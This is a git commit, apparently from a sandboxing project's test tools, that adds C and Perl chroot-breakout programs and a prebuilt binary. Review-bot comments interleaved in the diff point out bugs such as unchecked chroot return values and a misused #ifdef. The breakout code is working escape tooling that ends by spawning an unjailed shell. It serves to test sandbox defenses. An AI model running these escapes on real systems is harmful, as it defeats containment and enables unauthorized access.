From 1cb8ef59101eeaa1b325fb7f881ded148b0de1d3 Mon Sep 17 00:00:00 2001
From: netblue30
Date: Sat, 31 Oct 2015 13:07:38 -0400
Subject: --chroot testing
---
 src/tools/unchroot | Bin 0 -> 9720 bytes
 src/tools/unchroot.c | 125 ++++++++++++++++++++++++++++++++++++++++++++++++++
 src/tools/unchroot.pl | 33 +++++++++++++
 3 files changed, 158 insertions(+)
 create mode 100755 src/tools/unchroot
 create mode 100644 src/tools/unchroot.c
 create mode 100755 src/tools/unchroot.pl
(limited to 'src/tools')
diff --git a/src/tools/unchroot b/src/tools/unchroot
new file mode 100755
index 000000000..d32ce2682
Binary files /dev/null and b/src/tools/unchroot differ
diff --git a/src/tools/unchroot.c b/src/tools/unchroot.c
new file mode 100644
index 000000000..21731296e
--- /dev/null
+++ b/src/tools/unchroot.c
@@ -0,0 +1,125 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+/*
+ ** You should set NEED_FCHDIR to 1 if the chroot() on your
+ ** system changes the working directory of the calling
+ ** process to the same directory as the process was chroot()ed
+ ** to.
+ **
+ ** It is known that you do not need to set this value if you
+ ** running on Solaris 2.7 and below.
+ **
+ */
+#define NEED_FCHDIR 0
+
+#define TEMP_DIR "waterbuffalo"
+
+/* Break out of a chroot() environment in C */
+
+int main() {
+ int x; /* Used to move up a directory tree */
+ int done=0; /* Are we done yet ? */
+#ifdef NEED_FCHDIR
+ int dir_fd; /* File descriptor to directory */
+#endif
+ struct stat sbuf; /* The stat() buffer */
+
+ /*
+ ** First we create the temporary directory if it doesn't exist
+ */
+ if (stat(TEMP_DIR,&sbuf)<0) {
+ if (errno==ENOENT) {
+ if (mkdir(TEMP_DIR,0755)<0) {
+ fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,
+ strerror(errno));
+ exit(1);
+ }
+ }
+ else {
+ fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,
+ strerror(errno));
+ exit(1);
+ }
+ }
+ else if (!S_ISDIR(sbuf.st_mode)) {
+ fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);
+ exit(1);
+ }
+
+#ifdef NEED_FCHDIR
+ /*
+ ** Now we open the current working directory
+ **
+ ** Note: Only required if chroot() changes the calling program's
+ ** working directory to the directory given to chroot().
+ **
+ */
+ if ((dir_fd=open(".",O_RDONLY))<0) {
+ fprintf(stderr,"Failed to open \".\" for reading - %s\n",
+ strerror(errno));
+ exit(1);
+ }
+#endif
+
+ /*
+ ** Next we chroot() to the temporary directory
+ */
+ if (chroot(TEMP_DIR)<0) {
+ fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,
+ strerror(errno));
+ exit(1);
+ }
+
+#ifdef NEED_FCHDIR
+ /*
+ ** Partially break out of the chroot by doing an fchdir()
+ **
+ ** This only partially breaks out of the chroot() since whilst
+ ** our current working directory is outside of the chroot() jail,
+ ** our root directory is still within it. Thus anything which refers
+ ** to "/" will refer to files under the chroot() point.
+ **
+ ** Note: Only required if chroot() changes the calling program's
+ ** working directory to the directory given to chroot().
+ **
+ */
+ if (fchdir(dir_fd)<0) {
+ fprintf(stderr,"Failed to fchdir - %s\n",
+ strerror(errno));
+ exit(1);
+ }
+ close(dir_fd);
+#endif
+
+ /*
+ ** Completely break out of the chroot by recursing up the directory
+ ** tree and doing a chroot to the current working directory (which will
+ ** be the real "/" at that point). We just do a chdir("..") lots of
+ ** times (1024 times for luck :). If we hit the real root directory before
+ ** we have finished the loop below it doesn't matter as .. in the root
+ ** directory is the same as . in the root.
+ **
+ ** We do the final break out by doing a chroot(".") which sets the root
+ ** directory to the current working directory - at this point the real
+ ** root directory.
+ */
+ for(x=0;x<1024;x++) {
+ chdir("..");
+ }
+ chroot(".");
+
+ /*
+ ** We're finally out - so exec a shell in interactive mode
+ */
+ if (execl("/bin/sh","-i",NULL)<0) {
+ fprintf(stderr,"Failed to exec - %s\n",strerror(errno));
+ exit(1);
+ }
+}
diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl
new file mode 100755
index 000000000..bd30ffe76
--- /dev/null
+++ b/src/tools/unchroot.pl
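Review bot: `#ifdef NEED_FCHDIR` tests whether the macro is defined, not its value, so with `#define NEED_FCHDIR 0` at the top every guarded block (the dir_fd declaration, the open("."), the fchdir) is always compiled and the 0/1 switch the header comment describes never takes effect; the three guards should read `#if NEED_FCHDIR`. The return values of the 1024 `chdir("..")` calls and of the final `chroot(".")` are discarded, so when the sandbox under test refuses chroot(2) (EPERM without CAP_SYS_CHROOT, or a syscall filter) the program still execs `/bin/sh` inside the jail and a tester can mistake that shell for a successful escape; a test tool should fail loudly here, `if (chroot(".")<0) { fprintf(stderr,"Failed to chroot to . - %s\n",strerror(errno)); exit(1); }`. The exec passes "-i" as argv[0] with no separate -i argument and ends the list with an uncast NULL; `execl("/bin/sh","sh","-i",(char *)NULL)` is the portable form, and `done` is assigned but never read. The prebuilt `src/tools/unchroot` executable added by the same commit cannot be reviewed in the diff; building it from unchroot.c at test time instead of checking in the binary keeps the tree auditable.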
@@ -0,0 +1,33 @@
+#!/usr/bin/perl -w
+use strict;
+# unchroot.pl Dec 2007
+# http://pentestmonkey.net/blog/chroot-breakout-perl
+
+# This script may be used for legal purposes only.
+
+# Go to the root of the jail
+chdir "/";
+
+# Open filehandle to root of jail
+opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";
+
+# Create a subdir, move into it
+mkdir "mysubdir";
+chdir "mysubdir";
+
+# Lock ourselves in a new jail
+chroot ".";
+
+# Use our filehandle to get back to the root of the old jail
+chdir(*JAILROOT);
+
+# Get to the real root
+while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
+ chdir "..";
+}
+
+# Lock ourselves in real root - so we're not really in a jail at all now
+chroot ".";
+
+# Start an un-jailed shell
+system("/bin/sh");
-- 
cgit v1.2.3-54-g00ecf
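Review bot: Every privileged step after the opendir (`mkdir`, `chdir "mysubdir"`, both `chroot "."` calls, `chdir(*JAILROOT)`) discards its return value, so when the sandbox refuses chroot(2) the script still reaches `system("/bin/sh")` and hands the tester a shell that is still inside the jail, which defeats the purpose of a breakout test; each should carry an `or die`, e.g. `chroot "." or die "ERROR: chroot failed: $!\n";`. The `chdir ".."` inside the `while` loop needs the same check: if one step fails (a parent directory without search permission) the working directory does not move, the device/inode pair compared in the condition never changes, and the loop never terminates. The opendir die message ends in `jailn`, which reads like a lost `\n` escape; worth confirming against the file itself rather than the rendered diff. A short header comment stating that this script and unchroot.c are presumably negative tests for --chroot, expected to be stopped by the sandbox, would tell a reader why a breakout tool lives under src/tools.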